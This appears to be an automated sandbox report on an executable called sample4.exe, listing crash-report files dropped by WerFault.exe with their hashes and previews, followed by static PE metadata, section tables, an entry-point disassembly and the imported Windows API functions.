C:\ProgramData\Microsoft\Windows\WER\Temp\WERB3DB.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8398
Entropy (8bit):	3.6958613853599918
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNioB6Iyi6YSKSU1ygmfGuSrCpB089bknqsfPjMm:RrlsNim6Iyi6YPSU1ygmfGuSgknJf1
MD5:	BC396DA9A4C55BE808F8957D45A75BDA
SHA1:	B82FC5184F1FD8A6CCE6CE4D30801360CBE22ABF
SHA-256:	4C4A11CB625991638B1C94AC99108B026D5E52D225C36346E5036387BAD450B7
SHA-512:	DEBD0015E401E880E7867A27C8E87AF98C7AD4481F9C241891AD382E1EABD7632B750D84172DBB0F47BF4A768568F57B6EDA1D89CCF983B463620B67165DD1E4
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.1.0.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB592.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4753
Entropy (8bit):	4.4599661127230705
Encrypted:	false
SSDEEP:	48:cvIwSD8zsLJgtWI97TWSC8BE8fm8M4Jv6MFw+q8vc6ILJsGX7vXw3d:uITflgiSNzJSFKPILJsGX7vXgd
MD5:	567A6E034EA0B483BEB8BB0082030E96
SHA1:	F5E2FEE7B5D5899E3F4AB1DAF398EDE53A4F9C5F
SHA-256:	BF95A9735FD0ADDB4B23F80125BB7BEF1CC56E24C46367B091E4595DC9876EB4
SHA-512:	DD4C4B57EB09F498A818D5A683059A0EB5091C4CE847FF058BFDCE73A06AC69E50B5B2BD046E0CA6882F6B5D659248AC92F716F969331B17CA78DB03FB0BEB5E
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="816314" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERCB79.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Jan 14 12:04:12 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	87540
Entropy (8bit):	2.19600592359827
Encrypted:	false
SSDEEP:	384:ttutAzBwX8tErhMA1RUxbYc23OXylxzQzRCRnchtChjbcxIEDwnmI:HMAzBw4AeA3Ux323OXyXQzRCdKtiiDwX
MD5:	8C583E227B6B85DEEBE5B786648E2137
SHA1:	B580344D35DF3DF61CCCA1E4F2DCADFAC515BBCD
SHA-256:	91CB49C253F1E762A49AC001DD9B06F93D474F716BF3B7306E5C3DFAC37D9058
SHA-512:	6468FA16A4DFB3BA9B6E471A8BEFE155B99F2B7C965C1587CB69EA89774ACE7FA0F31D7E7084DBEDD03491DBDE316ABF1FC05BDA28250E967D5302A2532BF6D3
Malicious:	false
Preview:	MDMP....... .......<3.`...................U...........B......T.......GenuineIntelW...........T.......4....2.`:............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD677.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8400
Entropy (8bit):	3.695637388269918
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNioa6I296YSBSUGRfgmfGuSrCpBR89bVnqsfKHm:RrlsNid6I296Y0SUGRfgmfGuSfVnJfT
MD5:	C2E720B1A4E9CF17AF4E8ECEF455A2B7
SHA1:	750A0AA48D0E162F4D44B2CB3A4F65EB22C2B5CC
SHA-256:	39EF919FCEFCB20D2B89B7A4F398289638EBF94FC6BAFE003414EFD417A21A2F
SHA-512:	5EB1E91504FF55F7E4A3B61405C7A2FEAF15DCCBC44F7020B6A561B946784AF7ED0FBB7DCFB9FBC73207EB059725756A8773A0697C9A176A944C110E47254F93
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.1.0.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDE76.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4753
Entropy (8bit):	4.4636931605483605
Encrypted:	false
SSDEEP:	48:cvIwSD8zsLJgtWI97TWSC8BS8fm8M4Jv6MFx+q8vc6ILJsGX7vXw3d:uITflgiSNRJSQKPILJsGX7vXgd
MD5:	8AB32FB89B7F98E921F5C34E2619C25B
SHA1:	759DA4A133E32560168AD5B71B57E82649A0BE9E
SHA-256:	B3E728D937C7FB31FE21BD337B07E0DB1880075618DAB584ECC3CD84CDD3DBCA
SHA-512:	BDA5D9F30B1ED21085ED93D89D9FF8BCF3BA9CC1FC858F43BB05CD8C5459A1623E2C1FDCE076F0AAA3904BDC8BD119FE2C546F479AB40F60CCF0B05A9984D086
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="816314" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF661.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Jan 14 12:04:23 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	89920
Entropy (8bit):	1.9805037912276446
Encrypted:	false
SSDEEP:	384:ovZ6vbhAPkBGylxzXx3rrqw5ym1rPgY62EcOoEj0Gd2ol:P1APMGyXXNrYm1roYMoEIAl
MD5:	90409243EFAE234551EA1C01248C41D0
SHA1:	1AB4AC8A436E2CCE4D708C306504252552CB8092
SHA-256:	83AF683C5FD7E02271F18EF1280ECA5DDB688C5ACCB30AED591A17DE101B7550
SHA-512:	5B9C743BCBBD8742AAE5FC755475E03579AB649FCC37B47AFAA22A1A6F2E0999747518516ACCAE48B69343345AF089BB1F9D404503864AC989C11A92B445D701
Malicious:	false
Preview:	MDMP....... .......G3.`...................U...........B..............GenuineIntelW...........T.......4....2.`:............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.548995136814184
TrID:	Win32 Executable (generic) a (10002005/4) 98.68% Windows ActiveX control (116523/4) 1.15% Windows Screen Saver (13104/52) 0.13% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	sample4.exe
File size:	2136576
MD5:	5009b8bcf024704c8b23e42c492f118c
SHA1:	df607367a88b5610a224909efb8debeb0d90f487
SHA256:	30f099660904079afcd445409cfd2eca735fab49dda522f03ed60d47f9f21bdc
SHA512:	70c4d7c6b9124246def27e28b69f2eb30bac85a5c0e8b38cf593222bec02c561143ebf0995946d1c30ef5441a6152cf587ef2d70651482374017a321df1c8e3b
SSDEEP:	49152:o8X7Gl0vopNbyrbGhp475YHHmfjlzukdQ+ILi2k4TmRB:Z4Gopkrbk4UHmfhzukfILi2k4Tm
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....,0Y..................................... ................................"......v!...@................................

File Icon


Icon Hash:	71c4b2f0e8d4c4c6

Static PE Info

General
Entrypoint:	0x11796e8
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x1000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x59302CB5 [Thu Jun 1 15:03:17 2017 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	7da84c744589b5da0e6e3eb22df0b736

Entrypoint Preview

Instruction
call 00007FDD8C93D2C9h
jmp 00007FDD8C93C753h
jmp dword ptr [011D49B8h]
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007FDD8C93C08Ah
jmp 00007FDD8C93C8A0h
mov ecx, dword ptr [ebp-14h]
xor ecx, ebp
call 00007FDD8C93C079h
jmp 00007FDD8C93C88Fh
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [011B2F64h]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [011B2F64h]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1d49bc	0x168	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1f4000	0x17c2c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x20c000	0x1d2c0	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x38f60	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x38fb4	0x18	.text
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2b670	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1d4000	0x9b8	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1b02f4	0x1b0400	False	0.510258707165	data	6.51268656796	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x1b2000	0x21d98	0x5c00	False	0.319166100543	data	5.12748414797	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0x1d4000	0x3f8e	0x4000	False	0.398986816406	data	5.55581211033	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.gfids	0x1d8000	0x19e58	0x1a000	False	0.296001727764	data	4.22633465795	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.giats	0x1f2000	0x10	0x200	False	0.05078125	data	0.155177575305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0x1f3000	0x9	0x200	False	0.033203125	data	0.0203931352361	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x1f4000	0x17c2c	0x17e00	False	0.248680873691	data	4.95227644363	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x20c000	0x1d2c0	0x1d400	False	0.432366786859	data	6.49808502841	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x1f4370	0x94a8	data	English	United States
RT_ICON	0x1fd818	0x5488	data	English	United States
RT_ICON	0x202ca0	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 15794175, next used block 4294905600	English	United States
RT_ICON	0x206ec8	0x25a8	data	English	United States
RT_ICON	0x209470	0x10a8	data	English	United States
RT_ICON	0x20a518	0x988	data	English	United States
RT_ICON	0x20aea0	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x20b308	0xb0	data	English	United States
RT_DIALOG	0x20b3b8	0xb8	data	English	United States
RT_STRING	0x20b470	0x82	data	English	United States
RT_STRING	0x20b4f4	0x1ba	data	English	United States
RT_STRING	0x20b6b0	0x54	data	English	United States
RT_GROUP_ICON	0x20b704	0x68	data	English	United States
RT_VERSION	0x20b76c	0x364	data	English	United States
RT_MANIFEST	0x20bad0	0x15a	ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
GDI32.dll	GetViewportOrgEx, GetWindowOrgEx, SetPixelV, SetPaletteEntries, ExtFloodFill, PtInRegion, GetBoundsRect, FrameRgn, FillRgn, GetTextFaceW, ScaleWindowExtEx, CreateCompatibleDC, CreateFontW, GetPixel, CreateRectRgn, SelectClipRgn, RoundRect, OffsetRgn, GetRgnBox, Rectangle, LPtoDP, CreateRoundRectRgn, Polyline, Polygon, CreatePolygonRgn, GetTextColor, Ellipse, CreateEllipticRgn, SetDIBColorTable, CreateDIBSection, StretchBlt, SetPixel, GetTextCharsetInfo, EnumFontFamiliesW, CreateDIBitmap, CreateCompatibleBitmap, GetBkColor, RealizePalette, GetSystemPaletteEntries, GetPaletteEntries, GetNearestPaletteIndex, CreatePalette, EnumFontFamiliesExW, GetTextMetricsW, DPtoLP, SetRectRgn, PatBlt, CreateRectRgnIndirect, CombineRgn, GetTextExtentPoint32W, ScaleViewportExtEx, OffsetWindowOrgEx, OffsetViewportOrgEx, SetWindowOrgEx, SetWindowExtEx, SetViewportOrgEx, SetViewportExtEx, CopyMetaFileW, CreateDCW, GetDeviceCaps, CreateBitmap, SetBkColor, SetTextColor, GetObjectW, DeleteObject, BitBlt, CreateHatchBrush, CreatePen, CreatePatternBrush, CreateSolidBrush, DeleteDC, Escape, ExcludeClipRect, GetClipBox, GetObjectType, GetStockObject, GetViewportExtEx, GetWindowExtEx, IntersectClipRect, LineTo, PtVisible, RectVisible, RestoreDC, SaveDC, ExtSelectClipRgn, SelectObject, SelectPalette, SetBkMode, SetMapMode, SetLayout, GetLayout, SetPolyFillMode, SetROP2, SetTextAlign, MoveToEx, TextOutW, ExtTextOutW, CreateFontIndirectW
KERNEL32.dll	FreeEnvironmentStringsW, GetConsoleMode, GetConsoleCP, HeapCreate, LCMapStringW, GetTimeZoneInformation, VirtualProtect, HeapFree, GetDiskFreeSpaceW, GetModuleFileNameW, InitializeCriticalSectionAndSpinCount, GetEnvironmentVariableW, CreateFileW, GetCurrentThreadId, HeapValidate, FindFirstChangeNotificationW, HeapSize, Sleep, GetLastError, HeapReAlloc, GetStdHandle, ExitProcess, GetFileType, SetStdHandle, QueryPerformanceFrequency, WriteConsoleW, GetStringTypeW, VirtualAlloc, GetCommandLineW, GetCommandLineA, HeapQueryInformation, GetModuleHandleExW, FreeLibraryAndExitThread, ExitThread, CreateThread, SetEnvironmentVariableW, RaiseException, GetEnvironmentStringsW, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, GetFileTime, FreeLibrary, GetProcessHeap, GetCurrentProcessId, DeleteCriticalSection, GetTimeFormatW, DecodePointer, HeapCompact, GetLocalTime, HeapAlloc, LoadLibraryW, GetSystemInfo, VirtualQuery, GetModuleHandleW, GetProcAddress, LoadLibraryExA, OutputDebugStringA, SetLastError, GetModuleHandleA, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GlobalAlloc, GlobalReAlloc, GlobalLock, GlobalHandle, GlobalUnlock, GlobalFree, LocalAlloc, LocalReAlloc, LocalFree, LoadResource, LockResource, SizeofResource, FindResourceW, WideCharToMultiByte, GlobalSize, MulDiv, FormatMessageW, CopyFileW, MultiByteToWideChar, CloseHandle, SetEvent, WaitForSingleObject, CreateEventW, SetThreadPriority, ResumeThread, lstrcmpA, GlobalGetAtomNameW, FileTimeToSystemTime, EncodePointer, GetSystemDirectoryW, FreeResource, LoadLibraryExW, GlobalDeleteAtom, lstrcmpW, LoadLibraryA, GlobalAddAtomW, GlobalFindAtomW, FindClose, FindFirstFileW, FlushFileBuffers, GetFileSize, GetFullPathNameW, GetVolumeInformationW, LockFile, ReadFile, SetEndOfFile, SetFilePointer, UnlockFile, WriteFile, DuplicateHandle, GetCurrentProcess, lstrcmpiW, CompareStringW, GetUserDefaultUILanguage, GlobalFlags, GetVersionExW, FileTimeToLocalFileTime, GetFileAttributesW, GetFileAttributesExW, GetFileSizeEx, SystemTimeToTzSpecificLocalTime, lstrcpyW, GetCurrentDirectoryW, FindResourceExW, GetWindowsDirectoryW, VerSetConditionMask, VerifyVersionInfoW, GetTempFileNameW, GetTempPathW, GetTickCount, GetProfileIntW, SearchPathW, ResetEvent, WaitForSingleObjectEx, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetSystemTimeAsFileTime, InitializeSListHead, OutputDebugStringW, RtlUnwind, SetFilePointerEx
USER32.dll	UnhookWindowsHookEx, SendMessageW, EnableWindow, IsWindowEnabled, MessageBoxW, GetWindowLongW, GetParent, GetLastActivePopup, GetMenuStringW, GetSubMenu, GetMenuItemID, GetMenuItemCount, InsertMenuW, AppendMenuW, RemoveMenu, GetMessageW, TranslateMessage, DispatchMessageW, PeekMessageW, IsWindowVisible, GetActiveWindow, GetKeyState, ValidateRect, GetCursorPos, SetWindowsHookExW, CallNextHookEx, GetSystemMetrics, GetDC, ReleaseDC, GetSysColor, LoadCursorW, GetWindowTextW, GetWindowTextLengthW, GetFocus, CheckMenuItem, EnableMenuItem, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, SetMenuItemInfoW, LoadBitmapW, RegisterWindowMessageW, GetMessagePos, GetMessageTime, PostMessageW, DefWindowProcW, CallWindowProcW, RegisterClassW, GetClassInfoW, GetClassInfoExW, CreateWindowExW, IsWindow, IsMenu, IsChild, DestroyWindow, SetWindowPos, GetWindowPlacement, SetWindowPlacement, BeginDeferWindowPos, DeferWindowPos, EndDeferWindowPos, IsIconic, GetDlgItem, GetDlgCtrlID, SetFocus, GetCapture, GetMenu, SetMenu, TrackPopupMenu, UpdateWindow, SetActiveWindow, SetForegroundWindow, BeginPaint, EndPaint, RedrawWindow, ScrollWindow, SetScrollPos, GetScrollPos, SetScrollRange, GetScrollRange, ShowScrollBar, SetPropW, GetPropW, RemovePropW, AdjustWindowRectEx, ScreenToClient, MapWindowPoints, CopyRect, EqualRect, PtInRect, SetWindowLongW, GetClassLongW, GetClassNameW, GetTopWindow, GetWindow, LoadIconW, SetScrollInfo, GetScrollInfo, WinHelpW, MonitorFromWindow, GetMonitorInfoW, ShowWindow, MoveWindow, CheckDlgButton, GetWindowThreadProcessId, SetWindowTextW, IsDialogMessageW, DestroyIcon, CharUpperW, ClientToScreen, GetDesktopWindow, RealChildWindowFromPoint, DrawTextW, DrawTextExW, GrayStringW, TabbedTextOutW, GetWindowDC, FillRect, DestroyMenu, GetMenuItemInfoW, InflateRect, SystemParametersInfoW, CopyImage, SendDlgItemMessageA, SetRectEmpty, OffsetRect, PostQuitMessage, EndDialog, GetNextDlgTabItem, GetAsyncKeyState, MapDialogRect, IntersectRect, TrackMouseEvent, InvalidateRect, LoadImageW, ShowOwnedPopups, SetCursor, DeleteMenu, SetTimer, KillTimer, GetNextDlgGroupItem, SetCapture, ReleaseCapture, WindowFromPoint, DrawFocusRect, IsRectEmpty, DrawIconEx, GetIconInfo, MessageBeep, EnableScrollBar, HideCaret, InvertRect, NotifyWinEvent, GetMenuDefaultItem, MapVirtualKeyW, GetKeyNameTextW, LoadMenuW, SetLayeredWindowAttributes, EnumDisplayMonitors, SetClassLongW, SetWindowRgn, SetParent, OpenClipboard, CloseClipboard, SetClipboardData, EmptyClipboard, DrawStateW, DrawEdge, DrawFrameControl, IsZoomed, GetSystemMenu, BringWindowToTop, SetCursorPos, CopyIcon, FrameRect, DrawIcon, UnionRect, UpdateLayeredWindow, MonitorFromPoint, LoadAcceleratorsW, TranslateAcceleratorW, InsertMenuItemW, UnpackDDElParam, ReuseDDElParam, GetComboBoxInfo, PostThreadMessageW, WaitMessage, GetKeyboardLayout, IsCharLowerW, MapVirtualKeyExW, ToUnicodeEx, GetKeyboardState, CreateAcceleratorTableW, DestroyAcceleratorTable, CopyAcceleratorTableW, SetRect, LockWindowUpdate, SetMenuDefaultItem, GetDoubleClickTime, ModifyMenuW, RegisterClipboardFormatW, CharUpperBuffW, IsClipboardFormatAvailable, GetUpdateRect, DrawMenuBar, DefFrameProcW, DefMDIChildProcW, TranslateMDISysAccel, SubtractRect, CreateMenu, GetWindowRgn, DestroyCursor, GetWindowRect, CreatePopupMenu, GetForegroundWindow, DialogBoxIndirectParamW, GetClientRect, GetSysColorBrush, CreateDialogIndirectParamW, GetMenuState
COMCTL32.dll	ImageList_SetOverlayImage, CreateStatusWindowW, CreateToolbarEx, DestroyPropertySheetPage, ImageList_LoadImageW
COMDLG32.dll	GetFileTitleW, GetSaveFileNameW, FindTextW, GetOpenFileNameW
ole32.dll	CoInitializeEx, IsAccelerator, OleTranslateAccelerator, OleDestroyMenuDescriptor, OleCreateMenuDescriptor, OleLockRunning, RevokeDragDrop, RegisterDragDrop, CoLockObjectExternal, OleGetClipboard, DoDragDrop, CreateStreamOnHGlobal, CoCreateInstance, CoDisconnectObject, ReleaseStgMedium, OleDuplicateData, CoTaskMemFree, CoTaskMemAlloc, CoRevokeClassObject, OleInitialize, CoUninitialize, OleSetContainedObject, CoInitialize, OleUninitialize
WS2_32.dll	setsockopt, WSACleanup, WSACloseEvent, WSACreateEvent, getprotobynumber, WSAStartup, WSAConnect, socket, WSAAddressToStringW, getservbyname
WININET.dll	InternetCanonicalizeUrlW, InternetOpenUrlW, InternetWriteFile, InternetOpenW, InternetReadFile, InternetCloseHandle, InternetQueryDataAvailable, InternetCrackUrlW, InternetSetFilePointer, HttpQueryInfoW
SHLWAPI.dll	PathCanonicalizeW, PathIsRootW, StrCmpW, StrFormatKBSizeW, PathRemoveFileSpecW, PathFindExtensionW, PathStripToRootW, SHCreateStreamOnFileW, PathIsUNCW, PathFindFileNameW
UxTheme.dll	GetThemeTextExtent, DrawThemeText, DrawThemeParentBackground, OpenThemeData, GetThemeBackgroundRegion, CloseThemeData, DrawThemeBackground, GetThemePartSize, GetThemeSysColor, IsThemeBackgroundPartiallyTransparent, IsAppThemed, GetWindowTheme, GetCurrentThemeName, GetThemeColor
IMM32.dll	ImmGetContext, ImmReleaseContext, ImmSetCompositionFontW, ImmSetCompositionWindow, ImmGetCompositionStringW, ImmNotifyIME, ImmGetOpenStatus
WINSPOOL.DRV	ClosePrinter, DocumentPropertiesW, OpenPrinterW
OLEACC.dll	AccessibleObjectFromWindow, LresultFromObject, CreateStdAccessibleObject
SHELL32.dll	SHGetSpecialFolderLocation, ShellExecuteW, SHGetFileInfoW, SHAppBarMessage, SHBrowseForFolderW, DragFinish, DragQueryFileW, SHGetPathFromIDListW, SHGetDesktopFolder
